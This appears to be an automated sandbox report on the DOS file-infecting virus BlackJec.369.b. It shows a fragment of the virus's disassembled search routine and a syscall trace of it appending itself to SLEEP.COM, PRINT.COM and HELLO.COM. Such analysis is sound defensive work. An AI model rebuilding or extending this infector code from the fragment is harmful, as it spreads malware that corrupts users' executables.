Sample viewer

vx.netlux.org/Virus.DOS.BlackJec.369.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:21.477326011Z 42 PC: 12a7a | Get date 0x12a7a: mov word ptr [0xf2], dx
0x12a7e: mov word ptr [0xf4], cx
0x12a82: stc
0x12a83: mov dx, 0x268
0x12a86: mov ah, 0x4e
0x12a88: mov cx, 0x20
0x12a8b: int 0x21
0x12a8d: or ax, ax
0x12a8f: je 0x12a94
0x12a91: jmp 0x12b69
0x12a94: mov ah, 0x2f
0x12a96: int 0x21
0x12a98: mov ax, word ptr es:[bx + 0x1a]
0x12a9c: mov word ptr [0xfc], ax
0x12a9f: add bx, 0x1e
0x12aa2: mov word ptr [0xfe], bx
0x12aa6: mov ax, 0x4f43
0x12aa9: sub ax, word ptr [0x9e]
0x12aad: jne 0x12ab2
0x12aaf: jmp 0x12b5d
2018-12-17T22:25:21.480404399Z 78 PC: 12a8d | Find first file
2018-12-17T22:25:21.487297119Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T22:25:21.488828424Z 43 PC: 12aee | Set date
2018-12-17T22:25:21.492991049Z 61 PC: 12af6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:25:21.518051924Z 63 PC: 12b04 | Read file or device (Read 407 bytes on handle 5)
2018-12-17T22:25:21.524399541Z 60 PC: 12b41 | Create or truncate file
2018-12-17T22:25:21.543355867Z 64 PC: 12b53 | Write file or device (Write 776 bytes on handle 6)
2018-12-17T22:25:21.552547625Z 62 PC: 12b57 | Close file
2018-12-17T22:25:21.561121847Z 79 PC: 12b62 | Find next file
2018-12-17T22:25:21.565222757Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T22:25:21.566822479Z 43 PC: 12aee | Set date
2018-12-17T22:25:21.570371534Z 61 PC: 12af6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:25:21.585541601Z 63 PC: 12b04 | Read file or device (Read 27 bytes on handle 6)
2018-12-17T22:25:21.594188041Z 60 PC: 12b41 | Create or truncate file
2018-12-17T22:25:21.606638408Z 64 PC: 12b53 | Write file or device (Write 396 bytes on handle 7)
2018-12-17T22:25:21.610396588Z 62 PC: 12b57 | Close file
2018-12-17T22:25:21.619302797Z 79 PC: 12b62 | Find next file
2018-12-17T22:25:21.621961152Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T22:25:21.623152535Z 43 PC: 12aee | Set date
2018-12-17T22:25:21.627745278Z 61 PC: 12af6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:25:21.639374531Z 63 PC: 12b04 | Read file or device (Read 92 bytes on handle 7)
2018-12-17T22:25:21.645809455Z 60 PC: 12b41 | Create or truncate file
2018-12-17T22:25:21.658866646Z 64 PC: 12b53 | Write file or device (Write 461 bytes on handle 8)
2018-12-17T22:25:21.663570607Z 62 PC: 12b57 | Close file
2018-12-17T22:25:21.671674006Z 43 PC: 12b75 | Set date
2018-12-17T22:25:21.676424262Z 76 PC: 12a45 | Terminate with return code (Return code = '0')